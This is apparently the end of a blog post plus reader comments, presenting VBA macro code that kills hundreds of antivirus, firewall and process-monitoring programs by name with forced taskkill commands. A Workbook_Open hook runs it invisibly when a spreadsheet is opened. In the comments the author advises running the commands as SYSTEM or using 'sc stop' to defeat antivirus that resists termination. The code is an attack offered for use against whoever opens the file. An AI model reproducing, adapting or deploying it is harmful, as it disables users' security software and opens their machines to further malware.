Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssys.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msvxd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mu0311ad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navap.navapsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navdx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navstub.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nc2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ncinst4.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ndd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""neomonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""neowatchlog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netarmor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netinfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netscanpro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netspyhunter-1.2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netutils.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nod32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""norton_internet_secu_3.0_407.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""notstart.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npf40_tw_98_nt_me_2k.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npfmessenger.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nprotect.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npscheck.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npssvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nssys32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nstask32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntrtscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntvdm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntxconfig.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvarch16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvsvc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwinst4.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwtool16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ollydbg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""onsrvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""optimize.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ostronet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""otfix.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostproinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""panixk.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""patch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavproxy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcip10117_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pdsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""periscope.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""perswf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pf2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pfwadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pgmonitr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pingscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""platin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pop3trap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""poproxy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""popscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""portdetective.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""portmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""powerscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppinupdt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pptbc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppvstop.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prizesurfer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""procdump.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""processmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""procexplorerv1.0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""programauditor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""proport.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""protectx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pspf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""purge.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""qconsole.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""qserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rapapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav8win32eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rcsync.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""realmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""reged.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedt32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rrguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rshell.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscn95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rulaunch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""run32dll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ruxdll32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sahagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""save.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""savenow.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sbserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scam32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""setup_flowprotector_us.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""setupvameeval.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sfc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sgssfw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sh.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""shellspyinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""shn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""showbehind.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sms.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smss32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""soap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sofi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sperm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoler.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolcv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolsv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spyxx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""srexe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""srng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ss3edit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssg_4104.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssgrate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""st2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""start.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""stcloader.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""supftrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""support.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""supporter5.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchostc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchosts.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svshost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweepnet.sweepsrv.sys.swnetsup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""symproxysvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""symtray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysedit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""system.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""system32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taumon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tcm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds-3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""teekids.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak5.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tgbob.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""titanin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""titaninxp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tracert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trickler.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trojantrap3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tsadbot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvtmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""undoboot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""updat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""upgrad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""utpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcmserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcons.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbust.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwin9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwinntw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vcsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vfsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vir-help.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""virusmdpersonalfirewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnlan300.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnpc3000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc42.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpfw30s.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vptray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscenu6.02d30.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsisetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswin9xe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinntse.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinperse.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""w32dsm89.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""w9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""watchdog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webdav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webtrap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""whoswatchingme.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wimmun32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32us.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winactive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win-bugsfix.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""window.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""windows.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininetd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininitx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winlogin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winppr32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winrecon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winservn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winssk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart001.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wintsk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wkufind.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wradmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wrctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wsbgate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdater.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wyvernworksfirewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""xpf202en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapsetup3001.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zatutor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonalm2601.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""

Run_Sys_Cmds arrayCmds, INVISIBLE, WAIT
End Function


Call it with a simple:
Sub Workbook_Open()
Kill_AV
End Sub

4 comments:

w0lf said...

Nice one. But this would work only if the victim is an admin and also if AV always you to kill the process. enterprise edition antivirus process cannot be killed. :)

natron said...

Yes, this currently only works if the user has the ability to create services, which requires Admin privs.

Normally, you have to ask nicely to get Antivirus to shut down. If you run the command as SYSTEM, however, it'll normally kill itself and not come back. Should you run into an antivirus that won't allow it to be killed (because, for example, a helper process keeps restarting it), you can still usually get around it by using "sc stop servicename" rather than taskkill. Using sc is the "official" way those things should be killed anyway, but I didn't have a big list of service names.

If you try to kill it with admin privs and get an "access denied" message, just run it as SYSTEM and it should work just fine. (That's what this does; runs as SYSTEM.)

Mannu Thareja said...

Thanks. This is excellent.

While running the code, it is giving an error at -

Run_Sys_Cmds arrayCmds, INVISIBLE, Wait

Saying that the function or sub not defined. Please could you help?

Thanks.

natron said...

Mannu,

Yes, you have to create that subroutine as outlined in this post:

http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

FYI, this list of AV processes is old and probably no longer up to date. I don't have a newer list, but you could probably find one on google if you looked.